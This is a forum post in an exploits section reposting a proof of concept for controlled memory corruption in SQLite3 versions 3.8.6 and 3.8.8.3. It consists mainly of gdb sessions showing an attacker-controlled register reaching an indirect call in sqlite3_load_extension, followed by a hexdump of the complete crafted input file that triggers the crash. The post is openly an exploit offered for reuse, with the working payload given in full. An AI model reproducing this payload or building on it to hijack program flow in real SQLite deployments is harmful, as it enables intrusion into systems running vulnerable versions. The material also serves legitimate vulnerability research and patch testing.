Jump to content
Aerosol

SQLite3 3.8.6 - Controlled Memory Corruption PoC

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted (edited) 

# Exploit Title: SQLite3 controlled memory corruption PoC (0day)
# Date: [date]
# Exploit Author: Andras Kabai
# Vendor Homepage: http://www.sqlite.org/
# Software Link: http://www.sqlite.org/download.html
# Version: 3.8.6, 3.8.8.3
# Tested on: Ubuntu 14.10, 64 bit 3.8.6 (latest available package), 3.8.8.3 (built from the latest source code)

Using a crafted input (e.g. from a malicious file via “-init” parameter or directly given to the std input of the program) it is possible to trigger a memory corruption vulnerability in the most recent version of SQLite3. The memory corruption could be controlled, therefore the program flow could be manipulated by the attacker.

The following sections demonstrates the attack against the apt-get installed installed and updated sqlite3 and against a newer version that is built from source.

====

andrew@ubufuzzx6401:~/issues/sqlite$ which sqlite3
/usr/bin/sqlite3
andrew@ubufuzzx6401:~/issues/sqlite$ /usr/bin/sqlite3 -version
3.8.6 2014-08-15 11:46:33 9491ba7d738528f168657adb43a198238abde19e
andrew@ubufuzzx6401:~/issues/sqlite$ gdb64 /usr/bin/sqlite3
GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/bin/sqlite3...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) set args < sqlitepoc.txt
(gdb) r
Starting program: /usr/bin/sqlite3 < sqlitepoc.txt
warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Usage: .trace FILE|off
Error: near line 4: near "whatever": syntax error
Usage: .trace FILE|off

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7ba06a0 in sqlite3_load_extension () from /usr/lib/x86_64-linux-gnu/libsqlite3.so.0
(gdb) i r
rax            0x138    312
rbx            0x41414141424242 18367622009733698
rcx            0x7fffffffb590   140737488336272
rdx            0x0  0
rsi            0x555555779b43   93824994483011
rdi            0x41414141424242 18367622009733698
rbp            0x555555779b43   0x555555779b43
rsp            0x7fffffffb4c0   0x7fffffffb4c0
r8             0x555555779b41   93824994483009
r9             0x6c 108
r10            0x0  0
r11            0x0  0
r12            0x555555779b48   93824994483016
r13            0x7fffffffb590   140737488336272
r14            0x555555779b40   93824994483008
r15            0x2  2
rip            0x7ffff7ba06a0   0x7ffff7ba06a0 <sqlite3_load_extension+736>
eflags         0x10246  [ PF ZF IF RF ]
cs             0x33 51
ss             0x2b 43
ds             0x0  0
es             0x0  0
fs             0x0  0
gs             0x0  0
(gdb) disas $rip,+10
Dump of assembler code from 0x7ffff7ba06a0 to 0x7ffff7ba06aa:
=> 0x00007ffff7ba06a0 <sqlite3_load_extension+736>:    call   QWORD PTR [rbx+0x48]
   0x00007ffff7ba06a3 <sqlite3_load_extension+739>:   mov    r15,rax
   0x00007ffff7ba06a6 <sqlite3_load_extension+742>:   lea    rax,[rip+0x12bc1]        # 0x7ffff7bb326e
End of assembler dump.

===

andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ ./lt-sqlite3 -version
3.8.8.3 2015-02-25 13:29:11 9d6c1880fb75660bbabd693175579529785f8a6b
andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ gdb64 ./lt-sqlite3
GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./lt-sqlite3...done.
(gdb) set disassembly-flavor intel
(gdb) set args < /home/andrew/issues/sqlite/sqlitepoc.txt
(gdb) r
Starting program: /home/andrew/tmp/build/sqlite-autoconf-3080803/.libs/lt-sqlite3 < /home/andrew/issues/sqlite/sqlitepoc.txt
warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Usage: .trace FILE|off
Error: near line 4: near "whatever": syntax error
Usage: .trace FILE|off

Program received signal SIGSEGV, Segmentation fault.
sqlite3LoadExtension (pzErrMsg=0x7fffffffb510, zProc=0x0, zFile=0x6261c3 "CCCCBBBBAAAA", db=0x6261c8) at sqlite3.c:36169
36169         }
(gdb) i r
rax            0x138    312
rbx            0x41414141424242 18367622009733698
rcx            0x7fffffffb510   140737488336144
rdx            0x0  0
rsi            0x6261c3 6447555
rdi            0x41414141424242 18367622009733698
rbp            0x6261c3 0x6261c3
rsp            0x7fffffffb440   0x7fffffffb440
r8             0x6261c1 6447553
r9             0x6c 108
r10            0x7fffffffb270   140737488335472
r11            0x7ffff7b5ae50   140737349267024
r12            0x6261c8 6447560
r13            0x7fffffffb510   140737488336144
r14            0x6261c0 6447552
r15            0x2  2
rip            0x7ffff7b5b130   0x7ffff7b5b130 <sqlite3_load_extension+736>
eflags         0x10246  [ PF ZF IF RF ]
cs             0x33 51
ss             0x2b 43
ds             0x0  0
es             0x0  0
fs             0x0  0
gs             0x0  0
(gdb) disas $rip,+10
Dump of assembler code from 0x7ffff7b5b130 to 0x7ffff7b5b13a:
=> 0x00007ffff7b5b130 <sqlite3_load_extension+736>:    call   QWORD PTR [rbx+0x48]
   0x00007ffff7b5b133 <sqlite3_load_extension+739>:   mov    r15,rax
   0x00007ffff7b5b136 <sqlite3_load_extension+742>:   lea    rax,[rip+0x587d8]        # 0x7ffff7bb3915
End of assembler dump.

====

andrew@ubufuzzx6401:~/issues/sqlite$ hexdump -C sqlitepoc.txt
00000000  3b 0a 2e 74 20 78 0a 2e  74 0a 77 68 61 74 65 76  |;..t x..t.whatev|
00000010  65 72 00 0a 3b 0a 2e 74  0a 2e 6f 70 0a 2e 6c 20  |er..;..t..op..l |
00000020  43 43 43 43 42 42 42 42  41 41 41 41 0a           |CCCCBBBBAAAA.|
0000002d

Source

Edited by Aerosol

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...